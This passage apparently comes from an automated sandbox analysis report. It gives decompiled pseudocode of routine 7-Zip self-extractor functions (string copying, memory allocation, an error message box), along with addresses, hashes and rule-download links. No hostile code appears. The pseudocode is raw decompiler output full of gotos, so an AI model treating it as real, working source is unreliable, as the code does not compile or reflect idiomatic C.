						_a7 = 1;
						do {
							_v12();
							_v8 = _v8 + 1;
						} while (E00404F59() != 0);
						do {
							goto L1;
						} while (E00404F59() == 0);
						goto L10;
					}
					L13:
					_t27 = _a8;
					__eflags = _t27;
					if(_t27 != 0) {
						__eflags = _t27 - 1;
						if(__eflags == 0) {
							L19:
							_t27 = E004059A3(_v12, _t34, __eflags, 0x41d648, 0xffffffff);
						} else {
							_t27 =  *_t48 & 0x0000ffff;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								__eflags = _a7;
								if(_a7 == 0) {
									__eflags = _t27;
									if(__eflags != 0) {
										goto L19;
									}
								}
							} else {
								__eflags = _a8 - 0xffffffff;
								if(_a8 != 0xffffffff) {
									goto L17;
								}
							}
						}
					}
					_push(_v24);
					L0041C160();
					return _t27;
					L3:
					if(_t25 >= 0x61 && _t25 <= 0x7a) {
						goto L9;
					}
					if(_t25 >= 0x41 && _t25 <= 0x5a) {
						goto L9;
					}
					if(_t48 == _t49 && _a8 == 0xffffffff) {
						goto L9;
					}
					goto L13;
				}
			}












                                          0x004059ab
                                          0x004059b2
                                          0x004059b4
                                          0x004059b9
                                          0x004059bc
                                          0x004059be
                                          0x004059c2
                                          0x004059c2
                                          0x004059c2
                                          0x004059c8
                                          0x004059c8
                                          0x004059ed
                                          0x004059f1
                                          0x004059fd
                                          0x00405a05
                                          0x00405a0c
                                          0x00405a16
                                          0x004059c2
                                          0x004059c2
                                          0x004059c8
                                          0x004059c8
                                          0x00000000
                                          0x00405a18
                                          0x00405a18
                                          0x00405a18
                                          0x00405a1c
                                          0x00405a1e
                                          0x00405a24
                                          0x00405a2f
                                          0x004059c2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004059c2
                                          0x00405a35
                                          0x00405a38
                                          0x00405a38
                                          0x00405a3b
                                          0x00405a3d
                                          0x00405a3e
                                          0x00405a59
                                          0x00405a65
                                          0x00405a40
                                          0x00405a40
                                          0x00405a43
                                          0x00405a46
                                          0x00405a4e
                                          0x00405a4e
                                          0x00405a52
                                          0x00405a54
                                          0x00405a57
                                          0x00000000
                                          0x00000000
                                          0x00405a57
                                          0x00405a48
                                          0x00405a48
                                          0x00405a4c
                                          0x00000000
                                          0x00000000
                                          0x00405a4c
                                          0x00405a46
                                          0x00405a3e
                                          0x00405a6a
                                          0x00405a6d
                                          0x00405a77
                                          0x004059cf
                                          0x004059d2
                                          0x00000000
                                          0x00000000
                                          0x004059dc
                                          0x00000000
                                          0x00000000
                                          0x004059e5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004059e5

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405A6D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@??3@
                                          • String ID: PreExtract$Shortcut
                                          • API String ID: 1936579350-2482910946
                                          • Opcode ID: f8e0357409be0b6cdbe03f962f647e9891eaa1f72a5def6d86fbd7537504d4e0
                                          • Instruction ID: f0f3e7433b1fc6c74c74fcfde131b98a5d6d07456df403abe6898ee91eb4b0a3
                                          • Opcode Fuzzy Hash: f8e0357409be0b6cdbe03f962f647e9891eaa1f72a5def6d86fbd7537504d4e0
                                          • Instruction Fuzzy Hash: 632185B4A00605DACF24EA55C5856BF7775DF41728F20463BE861B62C1DA7C8E80CE69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041499A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E0041499A(signed int* __ecx, signed int _a4) {
				signed int _t20;
				signed int _t23;
				char* _t25;
				signed int _t27;
				signed int _t35;
				signed int* _t37;
				signed int _t38;
				void* _t41;

				_t25 = _a4;
				_t38 = 0;
				_t37 = __ecx;
				if( *_t25 != 0) {
					do {
						_t38 = _t38 + 1;
					} while ( *((char*)(_t38 + _t25)) != 0);
				}
				_t41 = _t38 - _t37[2];
				if(_t41 > 0) {
					_t35 = 2;
					_t23 = (_t38 + 1) * _t35;
					_push( ~(0 | _t41 > 0x00000000) | _t23);
					L0041C16C();
					_push( *_t37);
					_a4 = _t23;
					L0041C160();
					 *_t37 = _a4;
					_t37[2] = _t38;
				}
				_t27 =  *_t37;
				_t20 = 0;
				if(_t38 != 0) {
					do {
						 *((short*)(_t27 + _t20 * 2)) =  *(_t20 + _t25) & 0x000000ff;
						_t20 = _t20 + 1;
					} while (_t20 < _t38);
				}
				 *((short*)(_t27 + _t38 * 2)) = 0;
				_t37[1] = _t38;
				return 0;
			}











                                          0x0041499e
                                          0x004149a2
                                          0x004149a8
                                          0x004149aa
                                          0x004149ac
                                          0x004149ac
                                          0x004149ad
                                          0x004149ac
                                          0x004149b3
                                          0x004149b6
                                          0x004149bc
                                          0x004149c0
                                          0x004149c9
                                          0x004149ca
                                          0x004149cf
                                          0x004149d1
                                          0x004149d4
                                          0x004149de
                                          0x004149e0
                                          0x004149e0
                                          0x004149e3
                                          0x004149e5
                                          0x004149e9
                                          0x004149eb
                                          0x004149ef
                                          0x004149f3
                                          0x004149f4
                                          0x004149eb
                                          0x004149fa
                                          0x004149fe
                                          0x00414a05

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@??3@
                                          • String ID: XhV
                                          • API String ID: 1936579350-2999104372
                                          • Opcode ID: c23a49df95dae147832c9f3501f33c006e9143362f00e694c7bb24441b87f3e9
                                          • Instruction ID: efcf96bb588f5f785581641453fe326869f7e1b2344da6fede55aa69143f0c52
                                          • Opcode Fuzzy Hash: c23a49df95dae147832c9f3501f33c006e9143362f00e694c7bb24441b87f3e9
                                          • Instruction Fuzzy Hash: 030147B2A112356EC7218F38C88179BFBD4EF49740F20402FE445CB241C734A88187D8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041447C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E0041447C(intOrPtr* __ecx, char _a4) {
				char* _t8;
				intOrPtr _t9;
				intOrPtr* _t10;
				intOrPtr* _t12;
				char _t15;
				intOrPtr _t17;
				intOrPtr* _t19;

				_t1 =  &_a4; // 0x566858
				_t10 =  *_t1;
				_t19 = __ecx;
				if(_t10 != __ecx) {
					_t17 =  *((intOrPtr*)(_t10 + 4));
					if(_t17 >  *((intOrPtr*)(__ecx + 8))) {
						_t9 = _t17 + 1;
						_push(_t9);
						L0041C16C();
						_push( *__ecx);
						L0041C160();
						 *__ecx = _t9;
						 *((intOrPtr*)(__ecx + 8)) = _t17;
					}
					_t8 =  *_t19;
					 *((intOrPtr*)(_t19 + 4)) = _t17;
					_t12 =  *_t10;
					do {
						_t15 =  *_t12;
						 *_t8 = _t15;
						_t8 = _t8 + 1;
						_t12 = _t12 + 1;
					} while (_t15 != 0);
				}
				return _t19;
			}










                                          0x0041447d
                                          0x0041447d
                                          0x00414482
                                          0x00414486
                                          0x00414489
                                          0x0041448f
                                          0x00414491
                                          0x00414495
                                          0x00414496
                                          0x0041449b
                                          0x0041449f
                                          0x004144a6
                                          0x004144a8
                                          0x004144ab
                                          0x004144ac
                                          0x004144ae
                                          0x004144b1
                                          0x004144b4
                                          0x004144b4
                                          0x004144b6
                                          0x004144b8
                                          0x004144b9
                                          0x004144ba
                                          0x004144b4
                                          0x004144c2

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@??3@
                                          • String ID: XhV
                                          • API String ID: 1936579350-2999104372
                                          • Opcode ID: a36a1c0d369cddcb8d2fb15a98053fc4742f2d06a271a84d2e07d7e8a20c7b72
                                          • Instruction ID: d39ad9322e774bb9ea26ea97afb0e80c278408d31db554a684c90e8eec3cdf7a
                                          • Opcode Fuzzy Hash: a36a1c0d369cddcb8d2fb15a98053fc4742f2d06a271a84d2e07d7e8a20c7b72
                                          • Instruction Fuzzy Hash: 76F089366447159FC7109F5ED8C0597FBE9EF9AB10320845FE1C587712C776B8808BA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405A8F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405A8F() {

				MessageBoxA(0, "Could not allocate memory", "7-Zip SFX", 0x10);
				return 0;
			}



                                          0x00405a9d
                                          0x00405aa5

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Message
                                          • String ID: 7-Zip SFX$Could not allocate memory
                                          • API String ID: 2030045667-3806377612
                                          • Opcode ID: a489221f4986250d18ead154f7d6b7669e8a2de19b10e5f35446c668475b1b6f
                                          • Instruction ID: a049ee2480a7b50d5fda29a44b7701a856f8a6ed2be67fd4fe0477549e7dcf93
                                          • Opcode Fuzzy Hash: a489221f4986250d18ead154f7d6b7669e8a2de19b10e5f35446c668475b1b6f
                                          • Instruction Fuzzy Hash: DFB012743C830421D10083210C0FFC411509B0CF06F1048117902A80C2C5C87080910E
                                          Uniqueness

                                          Uniqueness Score: -1.00%